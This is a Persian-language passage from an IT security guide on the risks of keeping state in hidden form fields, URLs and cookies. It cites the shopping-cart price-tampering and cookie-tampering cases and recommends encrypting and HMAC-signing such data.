ﻋﻠﻴﻪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ CGIﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﻻﺯﻡ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺭﻧﺪ.
ﺫﺧﻴﺮﻩﻛﺮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﺑﺠﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ،ﻣﻨﻊ ﺫﺍﺗﻲ ﻧﺪﺍﺭﺩ ،ﺑﻠﻜﻪ ﺣﺘﻲ ﻧﻴﺎﺯ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ،ﺭﺩﻳﺎﺑﻲ ﻛـﺎﺭﺑﺮ ،ﻭ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺩﻳﮕﺮ ﺩﺭ ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﻣﺮﺗﻔﻊ ﻣﻲﺳﺎﺯﺩ؛ ﺍﻣﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﻫﺮﮔﺎﻩ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﺯ ﻛﺎﺭﺑﺮ
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﭼﻴﺰﻱ ﺍﺯ ﺁﻥ ﻧﺎﺩﺭﺳﺖ ﻧﺸﺪﻩ ﺑﺎﺷﺪ.
225 NT Challenge/Response
226 HTTP Digest Authentication
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٦٦
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻳﻴﺪ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﮔﺸﺘﻲ ﺍﺯ ﺳﻮﻱ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺩﺭﻙ ﻧﻤـﻲﻛﻨﻨـﺪ .ﺑﻌﻨـﻮﺍﻥ
ﻣﺜﺎﻝ ﺩﺭ ﺩﺳﺎﻣﺒﺮ ۱۹۹۹ﻣﻬﻨﺪﺳﺎﻥ ﺩﺭ ٢٢٧ISSﻣﺘﻮﺟﻪ ﺷﺪﻧﺪ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻛـﻪ ﻣﺘﻌﻠـﻖ ﺑـﻪ
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺨﺘﻠﻒ ﺑﻮﺩﻧﺪ ﻫﻤﮕﻲ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺸﺘﺮﻙ ﺩﺍﺭﻧﺪ :ﻫﻤﮕﻲ ﺁﻧﻬﺎ ﺍﺯ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﺮﺩﻧـﺪ ﻛـﻪ ﻗﻴﻤـﺖ
ﻣﻘﻄﻮﻉ ﻫﺮ ﻛﺎﻻ ﻧﻴﺰ ﺩﺭ ﺁﻥ ﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ ،ﺍﻣﺎ ﻫﻤﺔ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺑـﻮﺩ ﻭ ﻫـﻴﭻ ﺍﺭﺯﻳـﺎﺑﻲ ﺻـﺤﺘﻲ ﻧﻴـﺰ ﺭﻭﻱ ﺁﻧﻬـﺎ ﺍﻧﺠـﺎﻡ
ﻧﻤﻲﺷﺪ ٢٢٨.ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺁﻣﺎﺩﻩ ﻣﻲﺷﺪ ﻭ ﻫﺰﻳﻨﺔ ﺁﻥ ﺍﺯ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻛﺎﺳـﺘﻪ ﻣـﻲﺷـﺪ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺮﺑﻮﻃـﻪ ﺑـﺼﻮﺭﺕ
ﻛﻮﺭﻛﻮﺭﺍﻧﻪ ﺑﻪ ﻗﻴﻤﺘﻬﺎﻱ ﺭﻭﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﺮﺩﻧﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻫﺮ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﻣﻲﺧﻮﺍﺳﺖ ﺑﻪ ﺧﻮﺩﺵ ﺩﺭ ﻗﻴﻤﺘﻬﺎ ﺗﺨﻔﻴﻒ
ﺑﺪﻫﺪ ،ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺍﺭﺳﺎﻝ ﻳﻚ ﺩﺭﺧﻮﺍﺳﺖ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ،ﻓﺮﻡ HTMLﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨـﺪ،
ﻗﻴﻤﺘﻬﺎ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻧﻤﺎﻳﺪ ،ﻭ ﺳﭙﺲ ﺩﻛﻤﺔ "ﺧﺮﻳﺪ" ﺭﺍ ﺑﻔﺸﺎﺭﺩ.
ﺩﺭ ﻣﻄﺎﻟﻌﻪﺍﻱ ﻛﻪ ﺩﺭ ﺑﻬﺎﺭ ﺳﺎﻝ ۲۰۰۱ﺍﻧﺠﺎﻡ ﺷﺪ ٢٢٩،ﭼﻬﺎﺭ ﺗﻦ ﺍﺯ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻼﻥ MITﻣﺘﻮﺟﻪ ﺷﺪﻧﺪ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺗﺠـﺎﺭﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ cookieﻫﺎ ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﻧﻤﻲﻛﻨﻨﺪ ،ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺗﻐﻴﻴﺮﺍﺕ ﻫﻮﺷﻤﻨﺪﺍﻧﻪﺍﻱ
ﺩﺭ cookieﻫﺎﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺪﻫﻨﺪ ﺗﺎ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ.
ﺑﺮﺧﻲ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻭﺏ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﺟﻠﺴﻪ )ﺗﺸﺨﻴﺺ ﻛـﺎﺭﺑﺮ( ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻼ ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻭﻟﻴﺔ ،HTTPﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺑﻌﻀﹰﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ .ﻣﺜ ﹰ
ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻓﺮﻣﻬﺎﻱ ﺑﻌﺪﻱ ﺩﺭ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ:
>”<INPUT TYPE=”hidden” NAME=”username” VALUE=”simsong
>”<INPUT TYPE=”hidden” NAME=”password” VALUE=”myauth11
ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ﺑﻜﺎﺭ ﺭﻭﻧﺪ:
>”<INPUT TYPE=”hidden” NAME=”items” VALUE=”3
>”<INPUT TYPE=”hidden” NAME=”item1” VALUE=”Book of Secrets:$4.99
>”<INPUT TYPE=”hidden” NAME=”item2” VALUE=”Nasty Software:$45.32
>”<INPUT TYPE=”hidden” NAME=”item3” VALUE=”Helping Hand:$32.23
ﺑﺠﺎﻱ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ،ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺩﺭ URLﻗـﺮﺍﺭ ﺩﺍﺩ .ﺍﻳـﻦ URLﻫـﺎ ﭘـﺲ ﺍﺯ ﺭﺳـﻴﺪﻥ ﺑـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﻫﻤﺎﻥ ﺻﻮﺭﺕ ﻗﺒﻠﻲ ﺗﻌﺒﻴﺮ ﻣﻲﺷﻮﻧﺪ -ﻣﺸﺎﺑﻪ ﺣﺎﻟﺘﻲ ﻛﻪ ﺩﺭ ﻓﺮﻣﻬﺎﻱ ﺻﻔﺤﺎﺕ ﻭﺏ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻭ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ
ﻼ URLﺯﻳﺮ ﺣﺎﻭﻱ ﻫﻤﺎﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻗﺒﻠﻲ ﺍﺳﺖ:
HTTP GETﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ .ﻣﺜ ﹰ
http://www.vineyard.net/cgi-bin/password_tester?username=simsong&password=myauth11
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﺑﺴﻴﺎﺭ ﺁﺳﺎﻥ ﺍﺳﺖ ،ﺑﻪ ﺍﺯﺍﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻧﺎﭼﻴﺰﻱ )ﻭ ﺷﺎﻳﺪ ﺣﺘﻲ ﻫﻴﭻ ﺍﻃﻼﻋـﺎﺗﻲ( ﺑﺎﻳـﺪ ﺩﺭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ
ﺫﺧﻴﺮﻩ ﺷﻮﺩ؛ ﻭ ﺑﺮﺧﻼﻑ cookieﻫﺎ ﻛﻪ ﺑﻪ ۴۰۶۹ﺑﺎﻳﺖ ﻣﺤﺪﻭﺩ ﻣﻲﺷﻮﻧﺪ ،ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﺩﺭ ﻋﻤﻞ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﺍﻧﺪﺍﺯﺓ ﺩﻟﺨﻮﺍﻫﻲ ﺩﺍﺷﺘﻪ
ﺑﺎﺷﻨﺪ .ﺍﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﺑﻪ ﺍﻳﻨﺼﻮﺭﺕ ﻣﺸﻜﻼﺗﻲ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺭﺩ:
ﺍﮔﺮ ﻛﺎﺭﺑﺮ ﻛﻠﻴﺪ backﺭﺍ ﻓﺸﺎﺭ ﺩﻫﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺟﻨﺎﺱ ﺍﺯ ﻛﺎﺭﺕ ﺧﺮﻳﺪ ﺣﺬﻑ ﺷﻮﻧﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﻭ •
ﻣﻔﻴﺪ ﺍﺳﺖ ،ﺍﻣﺎ ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﻧﻴﺴﺖ.
ﻼ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻛـﻪﻣﻤﻜﻦ ﺍﺳﺖ ﺻﻔﺤﺎﺕ HTMLﻛﻪ ﺗﻮﺳﻂ ﻳﻜﻨﻔﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ،ﺑﻪ ﺭﺅﻳﺖ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺮﺳﺪ ،ﻣﺜ ﹰ •
ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻳﺎﻧﻪ ﻣﻴﺎﻥ ﭼﻨﺪ ﻧﻔﺮ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﺷـﺮﺍﻳﻂ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ،ﺭﻣـﺰ ﻋﺒـﻮﺭ ،ﻭ ﻳـﺎ
ﻣﺤﺘﻮﻳﺎﺕ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﺳﺎﻳﺮﻳﻦ ﺍﻓﺸﺎﺀ ﺷﻮﺩ.
ﺍﮔﺮ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺯ URLﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ URL ،ﻛﺎﻣﻞ -ﻛﻪ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ ﺟﺎﺳـﺎﺯﻱﺷـﺪﻩ ﺍﺳـﺖ -ﺩﺭ •
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺫﺧﻴﺮﻩ ﺧﻮﺍﻫﺪ ﺷﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺩﻳﮕﺮ ﺩﺳـﺘﻴﺎﺑﻲ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨـﺪ،
ﻣﺮﻭﺭﮔﺮ ﻣﻲﺗﻮﺍﻧﺪ URLﻛﺎﻣﻞ ﺭﺍ ﺩﺭ headerﺍﺭﺟﺎﻉﺩﻫﻨﺪﺓ ] [sicﺑﻔﺮﺳﺘﺪ ،ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻣﻨﻴﺖ ﻭ ﻳﺎ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ cookieﻫﺎ
ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﺟﺎﻟﺐ ﺑﺮﺍﻱ ﺍﻳﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻭ ﻳﺎ URLﻫﺎ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﭼـﻮﻥ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ،ﺭﻣـﺰ ﻋﺒـﻮﺭ،
ﻣﺤﺘﻮﻳﺎﺕ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ﻭ ﭼﻴﺰﻫﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ،ﺩﺭ cookieﻫﺎﻱ HTTPﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ.
ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ cookieﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺻﻼﺡ ﻛﻨﻨﺪ ،ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ cookieﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻛﺎﺭﺑﺮ ،ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ،ﻭ ﺳـﺎﻳﺮ ﺍﻧـﻮﺍﻉ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻧﻴﺰ ﺍﺯ ﻫﻤﺔ ﻣﺸﻜﻼﺕ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻭ ﻳﺎ URLﻫﺎﻱ ﺗﺮﻛﻴﺒﻲ ﺭﻧﺞ ﻣـﻲﺑﺮﻧـﺪ .ﻋـﻼﻭﻩ ﺑـﺮ
ﺍﻳﻦcookie ،ﻫﺎ ﻣﺸﻜﻼﺕ ﺧﺎﺹ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﺩﺍﺭﻧﺪ:
ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﺷﺮﺍﻳﻄﻲ ﺑﺘﻮﺍﻥ cookieﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺭﺍ -ﺣﺘﻲ ﭘﺲ ﺍﺯ ﺍﻧﻘﻀﺎﻱ ﺁﻧﻬﺎ -ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ؛ •
ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ cookieﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺍﺯ ﻛﭙﻲﺷﺪﻥ ﺧﻮﺩ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻨﺪ ﻧـﺴﺨﻪﻫـﺎﻱ ﺑﻠﻨﺪﻣـﺪﺕ •
ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ؛ ﻭ
ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ cookieﻫﺎ ﺧﻮﺷﺒﻴﻦ ﻧﻴﺴﺘﻨﺪ ﻭ ﻛ ﹰ
ﻼ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﻛﻨﻨﺪ. •
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﻣﻘﺎﻭﻡﻛﺮﺩﻥ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲURL ،ﻫﺎﻱ ﻣﺮﻛﺐ ،ﻭ cookieﻫﺎ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﮔﻔﺘﻪ ﺷﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲURL ،ﻫﺎﻱ ﺗﺮﻛﻴﺒـﻲ ،ﻭ cookieﻫـﺎ
ﺣﻞ ﻛﺮﺩ .ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺭﻙ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ ،ﻭ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺟﺎﺯﻩ ﺩﻫﺪ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﻭ ﻳﺎ ﺗﺼﺎﺩﻓﻲ ﺩﺭ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻛﺸﻒ ﻛﻨﻨﺪ .ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻬﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﻗﺒﻠﻲ ﻛﻪ
ﺩﺭ ﺁﻧﻬﺎ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ.
ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ:
_http://www.vineyard.net/cgi-bin/password
tester?p6e6J6FwQOk0tqLFTFYq5EXR03GQ1wYWG0ZsVnk09yv7ItIHG17ymls4UM%2F1bwHy
gRhp7ECawzUm%0AKl3Q%2BKRYhlmGILFtbde8%0A:
ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ،ﻣﺘﻐﻴﺮﻫﺎﻱ ﻗﺎﺑﻞ ﻓﻬﻢ ﺳﺎﺩﻩ ﺑﺎ ﻳﻚ ﺑﻠﻮﻙ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﻧﮕﺎﺭﻱﺷﺪﻩ ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻩﺍﻧﺪ .ﺍﻳـﻦ ﺑﻠـﻮﻙ ﺭﻣـﺰﻱ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺍﻟﻲ ﻣﺸﺎﺑﻪ ﺭﻭﺍﻝ ﺯﻳﺮ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ:
ﻣﺘﻐﻴﺮﻫﺎﻱ ﻣﻨﻔﺮﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﺍﺯ ﻣﻘﺪﺍﺭ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻛﺮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺷﺘﻪ ﺍﺯ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﻛﺪﮔـﺬﺍﺭﻱ ﻛﻨﻴـﺪ .ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺍﺻـﻄﻼﺡ .١
ﻣﺮﺗﺐﻛﺮﺩﻥ ٢٣٢ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ.
ﻳﻚ ﺑﺮﭼﺴﺐ ۴ﺑﺎﻳﺘﻲ ﺑﺮﺍﻱ ﺯﻣﺎﻥ ﺍﻳﻦ ﻣﺘﻐﻴﺮﻫﺎ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻴﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷـﻤﺎ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺣﻤـﻼﺕ .٢
"ﺗﻜﺮﺍﺭ" ﺍﻳﻤﻦ ﺷﻮﻧﺪ.
232 Marshalling
٣٦٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﻓﺸﺮﺩﻩ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻓﻀﺎﻱ ﻛﻤﺘﺮﻱ ﺍﺷﻐﺎﻝ ﮔﺮﺩﺩ. .٣
ﻃﻮﻝ ﺭﺷﺘﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺑﻪ ﻗﺎﻟﺐ ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎ ﺩﺭﺁﻭﺭﻳﺪ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻠﻮﻙ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ،ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ .٤
ﻻﺯﻡ ﺍﺳﺖ.
ﺭﺷﺘﺔ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺎﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﻣﺨﻔﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ. .٥
ﻳﻚ ﺗﺎﺑﻊ ﺧﻼﺻﺔ HMACﺍﺯ ﺍﻳﻦ ﺭﺷﺘﺔ ﺭﻣﺰﺷﺪﻩ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ ﻭ ﺁﻧﺮﺍ ﺑﻪ ﺭﺷﺘﺔ ﺭﻣﺰﺷﺪﻩ ﻣﺘﺼﻞ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺧﻼﺻﺔ HMACﺑﺎﻋﺚ .٦
